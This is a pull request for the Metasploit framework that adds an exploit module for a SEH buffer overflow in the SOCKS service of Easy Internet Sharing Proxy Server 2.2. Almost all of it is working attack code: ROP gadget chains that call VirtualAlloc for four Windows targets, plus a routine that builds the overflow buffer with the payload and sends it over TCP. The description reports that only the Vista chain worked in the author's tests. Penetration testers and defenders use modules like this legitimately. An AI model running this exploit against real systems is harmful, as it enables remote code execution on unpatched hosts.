### PR TITLE
Add Easy Internet Sharing Proxy Server SOCKS SEH Buffer Overflow module

### DIFF
--- a/modules/exploits/windows/proxy/easy_internet_sharing_proxy_server_seh.rb
+++ b/modules/exploits/windows/proxy/easy_internet_sharing_proxy_server_seh.rb
@@ -1,0 +1,254 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy Internet Sharing Proxy Server SOCKS SEH Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a SEH buffer overflow in the SOCKS server component
+        of Easy Internet Sharing Proxy Server version 2.2.
+
+        This module has been tested successfully on Windows Vista (x86).
+      },
+      'Author'         =>
+        [
+          'Tracy Turben <tracyturben[at]gmail.com>' # Discovery and metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => '2016-11-10',
+      'References'     =>
+        [
+          ['EDB', '40760']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ ARCH_X86 ],
+      'Payload'        =>
+        {
+          'Space' => 836,
+          'BadChars' => "\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+          'StackAdjustment' => -3500
+        },
+      'Targets'        =>
+        [
+          # [ 'Windows 10 (x86)',            { 'Ret' => 0x0043AD2C, 'Offset' => 836, 'Nops' => 44 } ],
+          # [ 'Windows 8.1 SP1 (x86)',       { 'Ret' => 0x0043AD30, 'Offset' => 908 } ],
+          # [ 'Windows 7 SP1 (x86)',         { 'Ret' => 0x0043AD38, 'Offset' => 884 } ],
+          [ 'Windows Vista SP0/SP2 (x86)', { 'Ret' => 0x0043AD38, 'Offset' => 864 } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 1080,
+          'EXITFUNC' => 'thread'
+        },
+      'Privileged'     => false,
+      'DefaultTarget'  => 0))
+  end
+
+  def target_vista_x86
+    rop_gadgets = [
+      0x0043fb03,
+      0x0043fb03,
+      0x0043fb03,
+      0x0043fb03,
+      0x0043fb03,
+      0x00454559,  # POP EAX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x00462589,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x004543b2,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046764d,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x004532e5,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # size
+      0x00486fac,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x0044fc45,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0045460d,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+    ].flatten.pack('V*')
+
+    sploit = "\x90" * 46
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << generate_seh_record(target.ret)
+    sploit
+  end
+
+  def target_win7_sp1_x86
+    rop_gadgets = [
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0047da72,  # POP EAX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x00450e40,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046934a,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # size
+      0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x00453ce6,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x00478ecd,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+    ].flatten.pack('V*')
+
+    sploit = "\x90" * 26
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << generate_seh_record(target.ret)
+    sploit
+  end
+
+  def target_win8_1_x86
+    rop_gadgets = [
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0047da72,  # POP EAX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x00450e40,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046934a,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # size
+      0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x00453ce6,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x00478ecd,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+    ].flatten.pack('V*')
+
+    sploit = "\x90" * 2
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << generate_seh_record(target.ret)
+    sploit
+  end
+
+  def target_win10_x86
+    rop_gadgets = [
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x0047f1de,  # POP EBX # RETN [easyproxy.exe]
+      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x41414141,  # Filler (compensate)
+      0x00438d30,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
+      0x004676b0,  # POP EBP # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]
+      0x0046bf38,  # POP EBX # RETN [easyproxy.exe]
+      0x00000001,  # 0x00000001-> ebx
+      0x00481477,  # POP EBX # RETN [easyproxy.exe]
+      0x00001000,  # 0x00001000-> edx
+      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
+      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
+      0x00000001,  # Filler (compensate)
+      0x00488098,  # POP ECX # RETN [easyproxy.exe]
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x41414141,  # Filler (RETN offset compensation)
+      0x00000040,  # 0x00000040-> ecx
+      0x0044ca38,  # POP EDI # RETN [easyproxy.exe]
+      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
+      0x00454559,  # POP EAX # RETN [easyproxy.exe]
+      0x90909090,  # nop
+      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
+    ].flatten.pack('V*')
+
+    sploit = "\x90" * 2
+    sploit << rop_gadgets
+    sploit << payload.encoded
+    sploit << make_nops(target['Nops'])
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << generate_seh_record(target.ret)
+    sploit
+  end
+
+  def exploit
+    connect
+
+    case target.name
+    when /Windows Vista/
+      sploit = target_vista_x86
+    when /Windows 7/
+      sploit = target_win7_sp1_x86
+    when /Windows 10/
+      sploit = target_win10_x86
+    when /Windows 8.1/
+      sploit = target_win8_1_x86
+    else
+      fail_with Failure::BadConfig, 'Invalid target selected'
+    end
+
+    print_status "Sending payload (#{sploit.length} bytes)"
+
+    sock.put(sploit)
+
+    handler
+    disconnect
+  end
+end


### PR DESCRIPTION
Leaving this here for reference.

A tidied re-submission of #7559, which was closed due to rubocop/msftidy issues.

The Vista target worked for me; but none of the other three ROPs worked (Win 7, Win 8.1, Win 10). Exploit-DB team apparently verified the Win 7 SP1 ROP; but it failed for me on both Win 7 Pro SP1 and Win 7 Ultimate SP1.

I know @OJ has done [some work](https://www.youtube.com/watch?v=J1Dt8pIe1RE) with this on Win 10, via a similar but different vector.

